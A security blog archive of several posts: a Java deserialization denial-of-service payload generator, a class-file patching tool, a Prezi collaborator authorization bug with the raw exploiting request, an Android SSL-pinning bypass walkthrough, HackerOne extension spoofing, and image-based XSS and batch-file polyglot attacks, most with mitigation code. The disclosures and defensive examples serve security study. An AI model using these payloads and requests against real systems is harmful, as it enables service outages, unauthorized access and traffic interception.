Tuesday, February 19, 2019

DoS Payload (works on the latest JRE) for the Java Deserialization issue

Reading the serialized payload below with the latest JRE (or an older one) makes the server fail immediately with a java.lang.StackOverflowError.

Payload:
https://github.com/csanuragjain/extra/blob/master/Deserialization%20issue/payloadNew.txt?raw=true

How is it created:

import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.util.HashSet;
import java.util.Set;


public class Payload2 {

    public static void main(String[] args) throws Exception {
        Set<Object> s = new HashSet<>();
        Set<Object> entry = new HashSet<>();
        s.add(entry);      // entry is still empty here, so its hashCode() is 0 and the add succeeds
        entry.add(entry);  // entry now contains itself
        // Writing succeeds: ObjectOutputStream emits the second occurrence of
        // entry as a back-reference, so the loop only bites when the stream is read.
        try (FileOutputStream fos = new FileOutputStream("payloadNew.txt");
             ObjectOutputStream oos = new ObjectOutputStream(fos)) {
            oos.writeObject(s);
        }
    }

}

What happens when the server reads it:
The server thread deserializing the payload dies with a java.lang.StackOverflowError. HashSet.readObject re-inserts each element into a fresh HashMap, which calls the inner set's hashCode(); AbstractSet.hashCode sums the hash codes of the set's elements, and the inner set's only element is the set itself, so the recursion never terminates.

What Oracle has to say:
There is no default JEP 290 serial filter that applies to all RMI
applications and eliminates all issues.  It is up to the application
writer to choose the configuration that makes an application the safest
it can be (given it's deserializing untrusted data).  In the given
examples HashMap and HashSet could be blocked to eliminate that issue.

In short, Oracle's advice is to block both of these classes with a serialization filter (JEP 290).
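As an added example (not code from the original post), here is the same self-referencing set built the way Payload2 builds it, read once without a filter and once through a JEP 290 ObjectInputFilter that rejects HashSet and HashMap as Oracle's reply suggests. The class and method names and the filter pattern string are my own; the block needs Java 9 or later for java.io.ObjectInputFilter (Java 8u121 and later expose the same pattern syntax through the jdk.serialFilter system property).

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashSet;
import java.util.Set;

public class SelfReferencingSetDemo {

    // Same object graph as Payload2: an outer HashSet holding an inner HashSet
    // that holds itself. Order matters: inner goes into outer while still empty
    // (hashCode 0), and only then is made self-referential.
    static byte[] buildPayload() throws IOException {
        Set<Object> outer = new HashSet<>();
        Set<Object> inner = new HashSet<>();
        outer.add(inner);
        inner.add(inner);
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(outer);   // the second occurrence of inner is written as a back-reference
        }
        return bos.toByteArray();
    }

    // Unfiltered read. HashSet.readObject puts every element back into a fresh
    // HashMap; put() calls inner.hashCode(), AbstractSet.hashCode sums the hash
    // codes of the elements, and inner's only element is inner, so the
    // recursion ends only when the thread's stack is exhausted.
    static String readUnfiltered(byte[] payload) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(payload))) {
            ois.readObject();
            return "deserialized";
        } catch (StackOverflowError e) {
            // caught here only so the demo can continue; a server should not rely on this
            return "StackOverflowError";
        }
    }

    // Filtered read (JEP 290, java.io.ObjectInputFilter, Java 9+). The pattern
    // rejects HashSet and HashMap by name, allows the rest of java.base and
    // rejects everything else. The check runs when the class descriptor is
    // read, before HashSet.readObject ever executes.
    static String readFiltered(byte[] payload) throws IOException, ClassNotFoundException {
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
                "!java.util.HashSet;!java.util.HashMap;java.base/*;!*");
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(payload))) {
            ois.setObjectInputFilter(filter);
            ois.readObject();
            return "deserialized";
        } catch (InvalidClassException e) {
            return "rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] payload = buildPayload();
        System.out.println("no filter  : " + readUnfiltered(payload));
        System.out.println("with filter: " + readFiltered(payload));
    }
}
```

Two things worth noticing when running it. The filter's maxdepth option would not have helped much here: the stream is only two objects deep and the loop is a back-reference, which does not add depth, so rejecting the classes by name (or, better, allow-listing only the classes the application actually expects and rejecting everything else with a trailing `!*`) is the control that works. And the unfiltered read shows why a per-request catch of StackOverflowError is not a fix: the reader only learns the graph is cyclic after the stack is already gone.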

My thoughts:
Not quite sure why an internal loop is even allowed.
The best way to mitigate this issue is not to trust any user-provided serialized data. But if you have to read it, then you need to be aware of these issues and should at least completely block these classes (although I think some other payload will always come).

Let me know your thoughts...

Monday, January 28, 2019

ClassModifier : Utility to easily modify your Java class files

Modify your Java class files easily with an interactive GUI.

Since a compiled class file cannot be edited directly as text, this tool converts the class file to Smali (the human-readable Dalvik assembly format), which can be edited. After the required changes are made, the tool converts the modified Smali back into a modified class file.
Features:
  • Modify a given Java class file
  • Lets a pen-tester verify whether a Java desktop application is safe from authentication bypass, i.e. whether its client-side checks can simply be patched out
  • Can change the logical behaviour of a Jar file by modifying one of its classes
  • Lets you rewrite private methods and change the access modifiers of a class's fields
  • Many other possibilities...

Download ClassModifier:

How to Use:

java -jar ClassModifier.jar

Menu:

File
  1. Open class (CTRL+O) - Takes the input class that needs to be modified
  2. Open Project (CTRL+P) - Reopens a project previously created with this tool
  3. Save & Convert (CTRL+S) - Saves the code and converts it into the modified class and Smali files
  4. Export Class (CTRL+E) - Exports the modified class
  5. Java 2 Smali Helper - Opens a tab where you can write any Java code; on saving, its equivalent Smali code is shown
  6. Smali 2 Java Helper - Opens a tab where you can write any Smali code; on saving, its equivalent Java code is shown
Edit
  1. Increase Code FontSize (CTRL+I) – Allows you to increase font size of shown code.
  2. Decrease Code FontSize (CTRL+D) – Allows you to decrease the font size of shown code.
  3. Remove all tabs – Removes all currently shown tabs.
Decompiler
  1. Change Decompiler – Allows you to switch between jadx and jd-cli decompilers.

Help
  1. Update Software – Helps you to update the current software if any update is available
  2. How to use Class Modifier– Contains the documentation of this tool

Toolbar
  1. Find in the current code, replace, replace all, and find across all classes

ClassModifier_lib Folder

  1. It ships with the software
  2. Contains the helper jars used by the program
  3. ClassModifier_lib\userLibrary is automatically added to the classpath when code is compiled. If you wish to compile your code against external jars, place those jars inside ClassModifier_lib\userLibrary

How to Use:
  • Open the Java class to be modified
  • On opening, ClassModifier shows the Smali version of the class file
  • Edit the Smali and make the required changes
  • Save the Smali file
  • The modified Java class file is created and can be exported at any time with File -> Export Class
  • Since editing Smali by hand can be difficult, two helpers are provided: Java 2 Smali and Smali 2 Java
  • As the name suggests, Java 2 Smali Helper shows the Smali equivalent of the Java code you enter
  • Similarly, Smali 2 Java Helper shows the Java equivalent of the Smali code you enter

Screenshot:

Note: This software is meant for educational purpose only. Don't use it for any illegal activity.

Friday, November 16, 2018

Spoofing file extensions on HackerOne

While testing HackerOne, I observed an issue with the file upload functionality. It seems that on file upload, the uploader uses the content within the file to determine the content type of the file instead of the file extension.

Although this does not pose much of a risk, since the changed extension would be visible at download time, I wanted to blog about it.

This gives rise to the two scenarios below:

Scenario 1

  • Open the batch.cmd attached to the posted comment
  • Observe that an image is rendered and there is no warning from HackerOne
  • The user downloads the file, thinking it is an image file
  • If the user overlooks the downloaded file's extension and opens it, the malicious batch file gets executed

Scenario 2

  • Open the myFile.txt attached to the posted comment
  • You will see a warning from HackerOne, but since the file is a .txt file the user might just go ahead
  • The user downloads the file, thinking it is a text file
  • If the user overlooks the downloaded file's extension and opens it, the malicious HTML script inside it executes

Reason:

  1. The Content-Disposition: attachment; filename="" header in the response from hackerone-attachments.s3.amazonaws.com carries an empty filename, so the browser has to choose the name (and extension) itself.
  2. HackerOne decided the Content-Type from the file's content (its leading bytes) rather than from the uploaded extension, so some browsers saved the file on the user's computer with an extension that did not match what the file really was, which is what produced Scenarios 1 and 2.
HackerOne Report:
https://hackerone.com/reports/268123 (Closed as Informative)

Saturday, November 3, 2018

SSL Pinning bypass on Android Emulator

Recently I developed interest in analyzing the Android apk network traffic.

I was able to capture traffic using an HTTP interceptor for some of the apks, but many other apks started giving an error in the interceptor - "The client failed to negotiate SSL connection".

On searching for this issue, I came to know that these apks perform SSL pinning. In order to capture their traffic, I needed to bypass the SSL pinning. After reading multiple articles, I found this easy way of doing so.

Requirements:

  1. Burp Suite - https://portswigger.net/burp/communitydownload
  2. XPosed apk framework: https://forum.xda-developers.com/showthread.php?t=3034811
  3. JustTrustMe - https://github.com/Fuzion24/JustTrustMe/releases
  4. Memu Android emulator - https://www.memuplay.com/


Steps:

Configuring Burp Suite:

  1. Install Burp Suite from https://portswigger.net/burp/communitydownload
  2. Follow all steps mentioned at https://support.portswigger.net/customer/portal/articles/1816883-getting-started-with-burp-suite
  3. For our case, we are setting Burp to listen on all interfaces on port 8085

XPosed apk framework:

  1. Download the framework from https://forum.xda-developers.com/showthread.php?t=3034811
  2. In my case the download link was https://forum.xda-developers.com/attachment.php?attachmentid=4393082&d=1516301692

JustTrustMe apk:

  1. Download the apk from https://github.com/Fuzion24/JustTrustMe/releases
  2. In my case it came out to be https://github.com/Fuzion24/JustTrustMe/releases/download/v.2/JustTrustMe.apk

Memu Android emulator:

  • Download the emulator from https://www.memuplay.com/
  • Install the emulator and open it.
  • Click the Settings button and then go to the Others tab
  • Click Enable for the Root mode option
  • Restart the emulator
  • Click the "Install APK" button on the right-hand toolbar of the Memu emulator
  • Choose the Xposed framework apk downloaded earlier
  • Open the app after installation
  • Click the Install/Update option inside the app
  • After the installation is complete, restart the emulator
  • If all went well, you will see something like the screenshot below
  • Again, click the "Install APK" button on the right-hand toolbar of the Memu emulator
  • Choose the JustTrustMe apk downloaded earlier
  • After JustTrustMe is installed, open the Xposed app
  • Open the Modules tab
  • Activate the JustTrustMe module by ticking its checkbox
  • Now go to the Wi-Fi settings in the emulator
  • Long-press the Wi-Fi network name until the Modify network option appears
  • Click Advanced options
  • Set the proxy host to the IP address of your host system and the port to 8085 (the port Burp is listening on)
  • Open any app on the emulator that has SSL pinning enabled
  • Observe that Burp Suite now captures all of its traffic and no longer reports the SSL error.


Note:
This post is only for educational purpose. Don't use this for any unauthorized activities.

Hope this helps.

Monday, September 18, 2017

Authorization bug which I discovered in Prezi

Prezi allows you to create cool presentations, which you can later share with your audience. It also allows you to add collaborators who can assist in creating your presentation.
I started testing Prezi for security vulnerabilities (bugbounty.prezi.com) and found an authorization bug which allowed me to add, delete or modify collaborators on any public prezi, even ones that were not mine.

Vulnerable Request:
When you add a collaborator to your prezi presentation, the following PUT request is sent:
PUT /api/v1/share/<presentation_id>/permissions/ HTTP/1.1
Host: prezi.com
Connection: close
Content-Length: 60
User-Agent: <User agent string>
Origin: https://prezi.com
x-csrftoken: <csrf_token>
content-type: application/json
Accept: */*
Referer: https://prezi.com/dashboard/next/
Accept-Language: en-US,en;q=0.8
Cookie: <Cookie for attacker@gmail.com>

{"email":"attackerNewIdOrRealCollaborator@gmail.com","permission":"viewer"}

Explanation of the above request:
1) <presentation_id> is the victim's presentation
2) attacker@gmail.com: the attacker who is sending the above request
3) attackerNewIdOrRealCollaborator@gmail.com: either the attacker's own ID or a genuine collaborator of this presentation with editor rights

What happens:
1) If the attacker used his own ID in the body, he became a collaborator on <presentation_id> without the victim's permission.
2) If the attacker used the ID of a genuine collaborator with editor rights, that collaborator's permission was lowered from editor to viewer.
3) If the attacker simply changed the request method from PUT to DELETE, any collaborator (except the owner) named in the body was removed from the presentation.
4) The attack worked only for public prezis (not private ones) because public prezis are somewhat special: everyone has view permission by default, even though they are not collaborators (people explicitly added to view or edit the prezi). The vulnerable endpoint treated this "default view permission" as a "collaborator permission", which allowed anyone to add anyone else as a view collaborator, and that "collaborator privilege" in turn made it possible to lower existing collaborators' permission to view level by re-adding them.
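As an added example (not Prezi's code), here is a toy model of the permissions endpoint with the broken rule reconstructed from point 4 next to one possible fix. The class and method names, the Permission enum, the e-mail addresses and the rule that only the owner may manage collaborators are my assumptions; the post does not describe what Prezi actually changed.

```java
import java.util.HashMap;
import java.util.Map;

public class ShareAuthzDemo {

    enum Permission { VIEWER, EDITOR, OWNER }

    // Toy model of a prezi: its owner, its visibility, and the collaborators
    // the owner explicitly added (email -> permission).
    static final class Presentation {
        final String owner;
        final boolean isPublic;
        final Map<String, Permission> collaborators = new HashMap<>();

        Presentation(String owner, boolean isPublic) {
            this.owner = owner;
            this.isPublic = isPublic;
        }

        // Effective permission of a user: owner, explicit collaborator entry, or
        // the implicit viewer right every account has on a public prezi.
        Permission effectivePermission(String user) {
            if (user.equals(owner)) {
                return Permission.OWNER;
            }
            Permission explicit = collaborators.get(user);
            if (explicit != null) {
                return explicit;
            }
            return isPublic ? Permission.VIEWER : null;
        }
    }

    // Vulnerable rule, reconstructed from point 4: having any permission on the
    // prezi (including the implicit public view right) was enough to manage
    // collaborators. On a private prezi a stranger has no permission at all, so
    // this rule refuses, which is why the attack only worked on public prezis.
    static boolean canManageVulnerable(Presentation p, String caller) {
        return p.effectivePermission(caller) != null;
    }

    // Fixed rule (an assumption, not necessarily Prezi's fix): only the owner
    // manages the collaborator list; the implicit public view right never counts.
    static boolean canManageFixed(Presentation p, String caller) {
        return caller.equals(p.owner);
    }

    // PUT /api/v1/share/<id>/permissions/ with {"email": ..., "permission": ...}
    static boolean setPermission(Presentation p, String caller, String email, Permission perm, boolean fixed) {
        boolean allowed = fixed ? canManageFixed(p, caller) : canManageVulnerable(p, caller);
        if (!allowed || email.equals(p.owner)) {
            return false;
        }
        p.collaborators.put(email, perm);   // adds a new collaborator or overwrites (lowers) an existing one
        return true;
    }

    // DELETE on the same path: removes the named collaborator (never the owner).
    static boolean removePermission(Presentation p, String caller, String email, boolean fixed) {
        boolean allowed = fixed ? canManageFixed(p, caller) : canManageVulnerable(p, caller);
        if (!allowed || email.equals(p.owner)) {
            return false;
        }
        return p.collaborators.remove(email) != null;
    }

    static Presentation publicPreziWithEditor() {
        Presentation p = new Presentation("victim@example.com", true);
        p.collaborators.put("editor@example.com", Permission.EDITOR);
        return p;
    }

    public static void main(String[] args) {
        String attacker = "attacker@example.com";

        Presentation vulnerable = publicPreziWithEditor();
        System.out.println("vulnerable: attacker adds self      -> "
                + setPermission(vulnerable, attacker, attacker, Permission.VIEWER, false));
        System.out.println("vulnerable: attacker lowers editor  -> "
                + setPermission(vulnerable, attacker, "editor@example.com", Permission.VIEWER, false)
                + ", editor now " + vulnerable.collaborators.get("editor@example.com"));
        System.out.println("vulnerable: attacker deletes editor -> "
                + removePermission(vulnerable, attacker, "editor@example.com", false));

        Presentation fixed = publicPreziWithEditor();
        System.out.println("fixed:      attacker adds self      -> "
                + setPermission(fixed, attacker, attacker, Permission.VIEWER, true));
        System.out.println("fixed:      attacker lowers editor  -> "
                + setPermission(fixed, attacker, "editor@example.com", Permission.VIEWER, true)
                + ", editor still " + fixed.collaborators.get("editor@example.com"));
        System.out.println("fixed:      owner adds collaborator -> "
                + setPermission(fixed, "victim@example.com", "friend@example.com", Permission.EDITOR, true));
    }
}
```

The design point is that "can see this resource" and "can change who else sees it" are different rights, and the check on a write endpoint has to ask the second question. The vulnerable rule collapses them into a single "has some permission" test, which is exactly what a default-public resource satisfies for everyone.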



I reported the same to Prezi which was fixed fast and Prezi rewarded a nice bounty :)

Sunday, July 23, 2017

Facial Detection using Java

In this post, we will learn how to extract faces from an image captured by a webcam. We will make use of two libraries, sarxos webcam-capture and OpenIMAJ.

Language Used:
Java

Git Repo:
https://github.com/csanuragjain/extra/tree/master/FaceRecognition

Website:
https://cooltrickshome.blogspot.com/2017/07/facial-recognition-using-java.html

Pom Dependency:
 <dependency>
   <groupId>org.openimaj</groupId>
   <artifactId>image-feature-extraction</artifactId>
   <version>1.3.5</version>
 </dependency>
 <dependency>
   <groupId>org.openimaj</groupId>
   <artifactId>faces</artifactId>
   <version>1.3.5</version>
 </dependency>
 <dependency>
   <groupId>com.github.sarxos</groupId>
   <artifactId>webcam-capture</artifactId>
   <version>0.3.11</version>
   <!-- default (compile) scope: FaceDetector uses this library in main code, so test scope would not compile -->
 </dependency>

Reference:
https://cooltrickshome.blogspot.com/2016/11/take-snapshot-from-webcam-using-java-in.html
http://openimaj.org/

Program:

FaceDetector.java

Variables:
      private static final long serialVersionUID = 1L;  
      private static final HaarCascadeDetector detector = new HaarCascadeDetector();  
      private Webcam webcam = null;  
      private BufferedImage img= null;  
      private List<DetectedFace> faces = null;  


main method:
 public static void main(String[] args) throws IOException {  
           new FaceDetector().detectFace();  
      }  

How it works:
1) We create an object of the FaceDetector class, which calls the default constructor, and then we call the detectFace method of this object.

FaceDetector constructor:
      public FaceDetector() throws IOException {
           webcam = Webcam.getDefault();
           if (webcam == null) {
                throw new IOException("No webcam found");
           }
           webcam.setViewSize(WebcamResolution.VGA.getSize());
           webcam.open(true);
           img = webcam.getImage();   // grab a single frame
           webcam.close();
           if (img == null) {
                throw new IOException("Webcam returned no frame");
           }
           ImagePanel panel = new ImagePanel(img);
           panel.setPreferredSize(WebcamResolution.VGA.getSize());
           add(panel);
           setTitle("Face Recognizer");
           setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
           pack();
           setLocationRelativeTo(null);
           setVisible(true);
      }

How it works:
1) We use the sarxos webcam-capture library for the webcam here
2) We get the default webcam object and set the view size
3) We open the webcam using the open method
4) We take one image from the webcam and store it in a BufferedImage object named img
5) We then close the webcam and pass the captured image to the ImagePanel class, which is added to the frame.
6) Finally we show the frame to the user with the webcam image that will be processed.

detectFace method:
      public void detectFace() {
           JFrame fr = new JFrame("Discovered Faces");
           // OpenIMAJ works on FImage (a single-band float image), so convert first
           faces = detector.detectFaces(ImageUtilities.createFImage(img));
           // detectFaces returns an empty list, not null, when nothing is found
           if (faces == null || faces.isEmpty()) {
                System.out.println("No faces found in the captured image");
                return;
           }
           Iterator<DetectedFace> dfi = faces.iterator();
           while (dfi.hasNext()) {
                DetectedFace face = dfi.next();
                FImage image1 = face.getFacePatch();   // crop of the detected face
                ImagePanel p = new ImagePanel(ImageUtilities.createBufferedImage(image1));
                fr.add(p);
           }
           fr.setLayout(new FlowLayout(FlowLayout.LEFT));
           fr.setSize(500, 500);
           fr.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
           fr.setVisible(true);
      }

How it works:
1) We use the OpenIMAJ library for face detection
2) We create a new frame which will show the results.
3) We call the detectFaces method of the HaarCascadeDetector object detector, passing the image to be processed. ImageUtilities is used to create an FImage out of the BufferedImage.
4) If no face is found in the image, a message is printed and the method returns.
5) Otherwise, we iterate through each DetectedFace and retrieve the face crop using the getFacePatch method.
6) Again we use the createBufferedImage method of the ImageUtilities class to get a BufferedImage out of the FImage.
7) We add all the faces to the resulting frame.

ImagePanel Class:
 package com.cooltrickshome;
 import java.awt.Dimension;
 import java.awt.Graphics;
 import java.awt.Image;
 import javax.swing.ImageIcon;
 import javax.swing.JPanel;
 // A fixed-size panel that paints one image at its natural size
 class ImagePanel extends JPanel {
  private Image img;
  public ImagePanel(String img) {
   this(new ImageIcon(img).getImage());   // load from a file path
  }
  public ImagePanel(Image img) {
   this.img = img;
   Dimension size = new Dimension(img.getWidth(null), img.getHeight(null));
   setPreferredSize(size);
   setMinimumSize(size);
   setMaximumSize(size);
   setSize(size);
   setLayout(null);
  }
  @Override
  public void paintComponent(Graphics g) {
   super.paintComponent(g);   // clear the background before drawing
   g.drawImage(this.img, 0, 0, null);
  }
 }

How it works:
1) This is used to show the image over a panel

Output:


Full Program:


FaceDetector.java
 package com.cooltrickshome;
 /**
  * Reference:
  * https://github.com/sarxos/webcam-capture/tree/master/webcam-capture-examples/webcam-capture-detect-face
  * http://openimaj.org/
  */
 import java.awt.FlowLayout;
 import java.awt.image.BufferedImage;
 import java.io.IOException;
 import java.util.Iterator;
 import java.util.List;
 import javax.swing.JFrame;
 import org.openimaj.image.FImage;
 import org.openimaj.image.ImageUtilities;
 import org.openimaj.image.processing.face.detection.DetectedFace;
 import org.openimaj.image.processing.face.detection.HaarCascadeDetector;
 import com.github.sarxos.webcam.Webcam;
 import com.github.sarxos.webcam.WebcamResolution;
 public class FaceDetector extends JFrame {
      private static final long serialVersionUID = 1L;
      // Haar-cascade (Viola-Jones) frontal face detector from OpenIMAJ
      private static final HaarCascadeDetector detector = new HaarCascadeDetector();
      private Webcam webcam = null;
      private BufferedImage img = null;
      private List<DetectedFace> faces = null;
      public FaceDetector() throws IOException {
           webcam = Webcam.getDefault();
           if (webcam == null) {
                throw new IOException("No webcam found");
           }
           webcam.setViewSize(WebcamResolution.VGA.getSize());
           webcam.open(true);
           img = webcam.getImage();   // grab a single frame
           webcam.close();
           if (img == null) {
                throw new IOException("Webcam returned no frame");
           }
           ImagePanel panel = new ImagePanel(img);
           panel.setPreferredSize(WebcamResolution.VGA.getSize());
           add(panel);
           setTitle("Face Recognizer");
           setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
           pack();
           setLocationRelativeTo(null);
           setVisible(true);
      }
      public void detectFace() {
           JFrame fr = new JFrame("Discovered Faces");
           // OpenIMAJ works on FImage (a single-band float image), so convert first
           faces = detector.detectFaces(ImageUtilities.createFImage(img));
           // detectFaces returns an empty list, not null, when nothing is found
           if (faces == null || faces.isEmpty()) {
                System.out.println("No faces found in the captured image");
                return;
           }
           Iterator<DetectedFace> dfi = faces.iterator();
           while (dfi.hasNext()) {
                DetectedFace face = dfi.next();
                FImage image1 = face.getFacePatch();   // crop of the detected face
                ImagePanel p = new ImagePanel(ImageUtilities.createBufferedImage(image1));
                fr.add(p);
           }
           fr.setLayout(new FlowLayout(FlowLayout.LEFT));
           fr.setSize(500, 500);
           fr.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
           fr.setVisible(true);
      }
      public static void main(String[] args) throws IOException {
           new FaceDetector().detectFace();
      }
 }

ImagePanel.java
 package com.cooltrickshome;
 import java.awt.Dimension;
 import java.awt.Graphics;
 import java.awt.Image;
 import javax.swing.ImageIcon;
 import javax.swing.JPanel;
 // A fixed-size panel that paints one image at its natural size
 class ImagePanel extends JPanel {
  private Image img;
  public ImagePanel(String img) {
   this(new ImageIcon(img).getImage());   // load from a file path
  }
  public ImagePanel(Image img) {
   this.img = img;
   Dimension size = new Dimension(img.getWidth(null), img.getHeight(null));
   setPreferredSize(size);
   setMinimumSize(size);
   setMaximumSize(size);
   setSize(size);
   setLayout(null);
  }
  @Override
  public void paintComponent(Graphics g) {
   super.paintComponent(g);   // clear the background before drawing
   g.drawImage(this.img, 0, 0, null);
  }
 }

Hope it helps :)

Friday, July 21, 2017

Some Image Based Exploits with their Prevention

Images can be used to run malicious scripts in the browser, and can also be used to deliver trojans, if your website does not handle them carefully. Trusting user input too much can cause damage to your clients.

In this post, we will run malicious scripts using a simple image viewer functionality and lastly we will discuss on how we can resolve this.

Programming Language
HTML, PHP

Git Repository
https://github.com/csanuragjain/extra/tree/master/ImageExploit

Website
https://cooltrickshome.blogspot.in/2017/07/some-image-based-exploits-with-their.html

One image-based vulnerability I reported:
https://hackerone.com/reports/221928

Scenario #1:
In this scenario, we will show how failing to set a Content-Type while displaying images can lead to malicious scripts being run.
 Malicious Image

Description
1)  Right Click on above Image and then Choose Save Image As
2) Name it as exifxss.jpg and Save it.
3) Otherwise you can also get it from the git location.

showImage.php
 <?php  
 include('exifxss.jpg');  
 ?>  


Description
A simple PHP file which displays the above jpg file.

Output:
  1. When you open showImage.php in your browser, you expect to see the image, but instead several pop-ups appear.
  2. This happens because include() treats the file as PHP source: every byte that is not PHP code is echoed straight into the response, and the page never sets a Content-Type, so PHP's default text/html applies. The browser parses the image bytes as HTML and runs the <script> tags stored in the image's EXIF data, one alert after another. (include() would also execute any <?php ... ?> block embedded in the image, which is worse than the XSS shown here.)
  3. showImage.php must set the correct Content-Type itself (image/jpeg here), must never take that Content-Type from user input, and should send the bytes with readfile() rather than include(). Sending X-Content-Type-Options: nosniff as well stops the browser from second-guessing the declared type.


Scenario #2:
In this scenario, we will show how a simple-looking image can become an exploit once it is downloaded.
Caution: this will run notepad, calc, msconfig and services.msc on your computer, although it won't do anything malicious.

Malicious Image

Description
1) Right-click on the above image and choose Save Image As
2) Name it image.bat and save it.
3) Otherwise you can also get it from the git location.

showImage2.html
 <img src="image.bat" width=500 height=500/>  

Description
A simple HTML file showing the image image.bat

Output:

  1. On accessing the above HTML, you see the Bugs Bunny image (nothing suspicious)
  2. Now right-click on the image and save it. It is saved as image.bat
  3. On opening it, the payload executes and opens notepad, services.msc, msconfig and calc: cmd.exe reports the image bytes as an unrecognised command and simply carries on with the lines appended after them.
  4. To prevent this, never let users store a file whose extension is not on an image allow-list, and check that the bytes really are that image type; serving downloads with a filename and an attachment Content-Disposition that you control helps as well.
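As an added example (not code from this post, from HackerOne, or from the repository), here is one check that covers both the extension spoofing post above ("Spoofing file extensions on HackerOne") and the two scenarios here: an upload is accepted only when its declared extension is on an image allow-list and its leading bytes really are that type, and a download endpoint sends headers so the browser neither has to invent a filename nor sniffs the body. The signature table, the class and method names and the three-header set are my assumptions; the sample byte arrays are constructed, not real files from the repository.

```java
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.LinkedHashMap;
import java.util.Locale;
import java.util.Map;

public class UploadCheckDemo {

    // Allow-listed image extensions and the magic bytes each must start with
    // (assumed table; GIF87a and other variants are omitted for brevity).
    private static final Map<String, byte[]> SIGNATURES = new LinkedHashMap<>();
    private static final Map<String, String> CONTENT_TYPES = new LinkedHashMap<>();
    static {
        SIGNATURES.put("png", new byte[] {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A});
        SIGNATURES.put("jpg", new byte[] {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF});
        SIGNATURES.put("gif", "GIF89a".getBytes(StandardCharsets.US_ASCII));
        CONTENT_TYPES.put("png", "image/png");
        CONTENT_TYPES.put("jpg", "image/jpeg");
        CONTENT_TYPES.put("gif", "image/gif");
    }

    // What the bytes alone say the file is: the decision a sniffing uploader makes.
    static String sniffedType(byte[] data) {
        for (Map.Entry<String, byte[]> e : SIGNATURES.entrySet()) {
            byte[] sig = e.getValue();
            if (data.length >= sig.length && Arrays.equals(Arrays.copyOf(data, sig.length), sig)) {
                return e.getKey();
            }
        }
        return null;
    }

    // Lower-cased extension from the uploaded name, with .jpeg folded into jpg.
    static String extensionOf(String filename) {
        int dot = filename.lastIndexOf('.');
        if (dot < 0 || dot == filename.length() - 1) {
            return null;
        }
        String ext = filename.substring(dot + 1).toLowerCase(Locale.ROOT);
        return ext.equals("jpeg") ? "jpg" : ext;
    }

    // Accept only when the declared extension is allow-listed AND the bytes are
    // that type. A .bat or .cmd that starts with image bytes fails on the
    // extension; HTML named .txt fails because nothing recognises the bytes;
    // a plain image passes. Returns the Content-Type to serve, or null.
    static String validatedType(String filename, byte[] data) {
        String ext = extensionOf(filename);
        String sniffed = sniffedType(data);
        if (ext == null || sniffed == null || !ext.equals(sniffed)) {
            return null;
        }
        return CONTENT_TYPES.get(ext);
    }

    // Response headers for a validated upload: a server-chosen Content-Type,
    // an explicit filename so the browser does not have to pick one, and
    // nosniff so the body is never reinterpreted as HTML.
    static Map<String, String> downloadHeaders(String filename, String contentType) {
        String safeName = filename.replaceAll("[^A-Za-z0-9._-]", "_");
        Map<String, String> headers = new LinkedHashMap<>();
        headers.put("Content-Type", contentType);
        headers.put("Content-Disposition", "attachment; filename=\"" + safeName + "\"");
        headers.put("X-Content-Type-Options", "nosniff");
        return headers;
    }

    public static void main(String[] args) {
        // Constructed samples, not files from the repository.
        byte[] png = {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A, 0, 0, 0, 13};
        byte[] jpegThenCommands = {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF, (byte) 0xE0, '\r', '\n', 'c', 'a', 'l', 'c'};
        byte[] html = "<script>alert(1)</script>".getBytes(StandardCharsets.UTF_8);

        System.out.println("logo.png   -> " + validatedType("logo.png", png));
        System.out.println("image.bat  -> " + validatedType("image.bat", jpegThenCommands));
        System.out.println("batch.cmd  -> " + validatedType("batch.cmd", png));
        System.out.println("myFile.txt -> " + validatedType("myFile.txt", html));
        System.out.println(downloadHeaders("logo.png", validatedType("logo.png", png)));
    }
}
```

Note what this check does not do: a polyglot that carries a legitimate image extension (valid JPEG bytes followed by commands, saved as .jpg) still passes, because by every rule above it is a JPEG. That is why the headers matter independently of the upload check, why uploads are best served from a separate origin, and why re-encoding images on upload (decoding and writing a fresh file) is the stronger option where the site can afford it, since it discards EXIF comments and trailing data along with the payload.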
Please let me know your suggestions and comments.
Hope it helps :)